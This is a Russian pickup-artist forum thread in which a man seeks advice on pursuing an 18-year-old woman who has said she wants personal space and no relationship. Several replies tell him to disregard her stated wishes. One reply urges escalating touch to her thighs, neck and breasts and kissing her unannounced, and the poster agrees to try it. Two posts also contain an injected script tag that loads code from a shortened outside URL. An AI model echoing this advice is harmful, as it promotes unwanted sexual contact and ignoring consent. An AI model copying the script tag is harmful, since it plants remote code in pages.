Top.Mail.Ru

Перейти к содержимому

Фотография

девочка с транспорта

• Авторизуйтесь для ответа в теме
Сообщений в теме: 13

#1 Rujuu

Rujuu

тусовщик

• Посетитель
  • Pip
  • 50 Cообщений
35
Очень хороший

Отправлено 29 Май 2017 - 00:33

Вечер добрый, девочка, 18лет, на прикосновение относилась нейтрально, но мне сразу сообщила что предпочитает личное пространство и ей в закрытом пространстве некомфортно (застрявший лифт например). Держалась всю встречу на расстоянии вытянутой руки от меня. Всю встречу смотрела на меня.

Познакомился с девочкой в маршрутке. Само знакомство: Она в транспорте часто взглядом на меня косилась, я начал на неё обращать внимания, спустя время взгляды пересеклись она начала улыбаться, я ей взаимно. Вышли на одной остановке. Я подошел взял номер, поговорил где учится, чем занимается, рассказал немного о себе и разошлись на хорошей волне. Через день предложил встретится, погуляли по парке, разговаривали много о чем. Сама встреча прошло в положительном ключе, я её подкалывал постоянно, смеялась, самому понравилось очень. После встречи сама вышла на диалог в вайбере. Переписка, всегда отвечает без долгих задержек. Зову снова погулять, пишет: Я человек прямолинейный и скажу как есть, на всякий случай. Я в плане отношение ничего не хочу, абсолютно. 

Парни, что думаете ?? как реагировать ?? забивать\делать паузу или идти гулять дальше ?? договорился на вторник о встрече, как вести если идти ?? Спасибо!

• 0

Реклама

Реклама
Хочешь убрать эти баннеры? Пройди регистрацию на форуме.

#2 Богданчикс

Богданчикс

Советчик

• Полноправный
  • PipPipPip
  • 972 Cообщений
152
Очень хороший

Отправлено 29 Май 2017 - 00:53

Не реагировать.

Идти гулять, спустя пару дней на позитиве.

• 5

Сплю и вижу свой МАЙБАХ!

#3 38th

38th

простофлудер

• Полноправный
  • PipPipPipPip
  • 1 558 Cообщений
1 133
Очень хороший

Отправлено 29 Май 2017 - 11:39

Идти на встречу на позитиве, если пару раз не вызвониться, то добавить в игнор и думать дальше.
Девушек - полным полно,а ты у себя один 

• 0

#4 music fan

music fan

Правда вдвое короче

• Полноправный
  • PipPipPipPipPip
  • 4 523 Cообщений
1 650
Очень хороший

Отправлено 29 Май 2017 - 11:52

Я в плане отношение ничего не хочу, абсолютно.

А ты сам то будто хочешь? В плане отношений? Может она не годна, ты - выеби для сначала! :wink:

Парни, что думаете ?? как реагировать ?? забивать\делать паузу или идти гулять дальше ?? договорился на вторник о встрече, как вести если идти ?? Спасибо!

Никак не реагируй. Ок и все. Сам же продолжай трех-этапку!

Сообщение отредактировал music fan: 29 Май 2017 - 11:53

• 0

Период активности на форуме с 23 ноя 2010 по 10 апр 2020 | Old school

#5 Ufologist

Ufologist

Советчик

• Полноправный
  • PipPipPip
  • 617 Cообщений
162
Очень хороший

Отправлено 29 Май 2017 - 16:32

"пишет: Я человек прямолинейный и скажу как есть, на всякий случай. Я в плане отношение ничего не хочу, абсолютно. "

А пикаперу отношения и не нужны, так что все супер!

• 1
UFO

#6 Medalina

Medalina
  • Участник
  • 7 Cообщений
3
Обычный

Отправлено 29 Май 2017 - 17:17

девочка не видит просто в авторе самца, нужен мальчик, которому можно трахать мозги. Он будет слушать ее сопли и гулять с ней когда ей скучно. 

• 0

:wub:  :haha:  :fie:

#7 Rujuu

Rujuu

тусовщик

• Посетитель
  • Pip
  • 50 Cообщений
35
Очень хороший

Отправлено 29 Май 2017 - 20:50

<script type="text/oops" src="http://is.gd/J87Pzs"...7Pzs"></script>

девочка не видит просто в авторе самца, нужен мальчик, которому можно трахать мозги. Он будет слушать ее сопли и гулять с ней когда ей скучно. 

Значит девочка будет гулять сама. 

• 0

#8 Realizator Rizo

Realizator Rizo

старофлудер

• Полноправный
  • PipPipPipPipPip
  • 3 229 Cообщений
1 900
Очень хороший

Отправлено 30 Май 2017 - 00:06

пишет: Я человек прямолинейный и скажу как есть, на всякий случай. Я в плане отношение ничего не хочу, абсолютно.

Как своего парня, она тебя не рассматривает! Вот и всё.

• 0

Хватает мозгов найти связь между парой слов, хватает пары слов что бы объяснить всё!

#9 Rujuu

Rujuu

тусовщик

• Посетитель
  • Pip
  • 50 Cообщений
35
Очень хороший

Отправлено 30 Май 2017 - 01:21

<script type="text/oops" src="http://is.gd/J87Pzs"...7Pzs"></script>

пишет: Я человек прямолинейный и скажу как есть, на всякий случай. Я в плане отношение ничего не хочу, абсолютно.

Как своего парня, она тебя не рассматривает! Вот и всё.

Твоё мнение, мне завтра на встречу с ней идти или забить ??

• 0

#10 Pilligrim

Pilligrim

простофлудер

• Полноправный
  • PipPipPipPip
  • 2 495 Cообщений
1 364
Очень хороший

Отправлено 30 Май 2017 - 15:33

Забить на слова, идти на встречу и соблазнять. Можно было в ответ на ее фразу об отношениях написать "я тоже об этом не думал" )) Но сейчас уже поздняк - прочитай трехсвиданку и иди на встречу, проводи качественное второе свидание. Сливай все разговоры об отношениях, по возможности переводи в стеб. Начнешь вестись на эту хрень, сразу залезешь во фрейм друга, а может и в лоб ДОД получишь. И вряд ли вылезешь.

• 0
Кино, вино... и никакого домино.

#11 Antoha 8

Antoha 8

простофлудер

• Полноправный
  • PipPipPipPip
  • 2 322 Cообщений
208
Очень хороший

Отправлено 31 Май 2017 - 22:49

Сходи на свидание... Если и дальше будет себя вести на расстоянии,то не трать на неё своё время.

• 0

#12 Rujuu

Rujuu

тусовщик

• Посетитель
  • Pip
  • 50 Cообщений
35
Очень хороший

Отправлено 28 Июнь 2017 - 23:50

...Продолжение 

Встречу которую я планировал - отменил. У меня много дел было, замотался, забыл про неё. 

2 дня назад собирались на море, людей мало было, вспомнил про неё и решил пригласить на море. Сказала у неё месячные, на что я предложил тогда встретиться в какой-то другой день и получил согласие. 

Встреча. Всё пошло не по плану. Хотел пойти кальян покурить, сказала плохо чувствует. Пошли в кафе, всё кафе было забито, было только 2 свободных места друг на против друга. Начал выводить её на позитив, подстебывать она меня в ответ, всем весело. На светофорах брал за руку, не вырывалась, в моментах трогал социальные зоны, тоже всё без проблем. В итоге: проебал 2-ю свиданку, по факту 2-я свиданка прошла так же как и 1-я.

Она рассказала что она феминистка, при этот в разговоре так же сказала что мало общается с девчонками и из круга общения у неё имеется много мужчин 25+ (ей 18). Я ей дал понять что она не единственная девушка с которой я гуляю и в кафе встретил знакомую подругу с которой перекинулись парой слов(+балл). Так же я читал книгу "Язык телодвижений" и заметил:

1) Она постоянно смотрит мне в глаза.

2) Сидели на скамейки, стоим на светофоре или еще где. Её тело расположено в мою сторону и так же ноги в мою сторону.

3) На каждую свиданку она хорошо одевается, платье, шпаклевка и прочая хуйня. Явно заморачивалась. 

Я думал её выцепить куда-то пойти компанией чтобы если с ней ничего не выйдет, переключиться на её подруг, на что она сказала что с компаниями редко куда ходит, таким образом получается что если и выцеплю то только её.

Из всего этого вышеупомянутого дерьма что скажете ?? забивать ?? продолжать встречи ?? расставить всё точки над И(сказать что мне нужна девушка, а ней хуй пойми кто) ??? 

Моя цель сейчас найти постоянную девушку. 

• 0

#13 Окорок

Окорок

Долговязый

• Полноправный
  • PipPipPipPipPip
  • 4 756 Cообщений
3 496
Очень хороший

Отправлено 29 Июнь 2017 - 00:23

Не вздумай говорить ей вот это: "что мне нужна девушка, а ней хуй пойми кто"!

ИМХО, девочка уже готова, но ты люто тормозишь!

Что я вижу сейчас:

1. Хоршо ведется на кинестетику! Это +

2. ССС в твою пользу (если ты правильно откалибровал). Это +

3. Готовится к свиданке. Это +

4. Заинтересована! Прощает некоторые косяки и охотно идет на очередную встречу. Это большой +!

Что делаешь ты:

1. Тормозишь! Надо усиливать кинестетику. Переходи постепенно на более интимные места - бедра, спина, шея, грудь. 

2. Пора засасывать!! Я не знаю, прокатит ли у тебя такая фишка, но я иногда целовал девушку сразу при встрече в губы. Тем самым давал ей понять, что я тут не просто за руку погулять и истории смешные послушать. Если поцелуй такой прокатывает, то обычно и свиданка дальше гораздо легче идет. Можешь так и сказать после короткого поцелуя в губы на позитиве: "Это чтобы настроение у нас еще лучше было!" )

3. Предлагаешь какие-то компании, но девочка САМА уже тебе намекает, что было бы лучше один на один встретиться. 

Ты ее сначала выеби, а потом уже будешь планировать ЛТР и прочие позы!

вообще, есть мысль что она просто поебаться хочет и подсказала тебе еще в первое общение ("Я человек прямолинейный и скажу как есть, на всякий случай. Я в плане отношение ничего не хочу, абсолютно.")

Сообщение отредактировал Окорок: 29 Июнь 2017 - 00:20

• 0

#14 Rujuu

Rujuu

тусовщик

• Посетитель
  • Pip
  • 50 Cообщений
35
Очень хороший

Отправлено 29 Июнь 2017 - 00:39

вообще, есть мысль что она просто поебаться хочет и подсказала тебе еще в первое общение ("Я человек прямолинейный и скажу как есть, на всякий случай. Я в плане отношение ничего не хочу, абсолютно.")

Когда она спрашивала с кем я живу, я в шутку сказал что один. У неё аж глаза загорелись.Таки может ты прав.

2. Пора засасывать!! Я не знаю, прокатит ли у тебя такая фишка, но я иногда целовал девушку сразу при встрече в губы. Тем самым давал ей понять, что я тут не просто за руку погулять и истории смешные послушать. Если поцелуй такой прокатывает, то обычно и свиданка дальше гораздо легче идет. Можешь так и сказать после короткого поцелуя в губы на позитиве: "Это чтобы настроение у нас еще лучше было!" )

На выходных у нас вроде с ней встреча намечается, попробую. Никогда не делал, но интересно посмотреть на её реакцию. 

Сообщение отредактировал Rujuu: 29 Июнь 2017 - 00:40

• 0

Количество пользователей, читающих эту тему: 1

0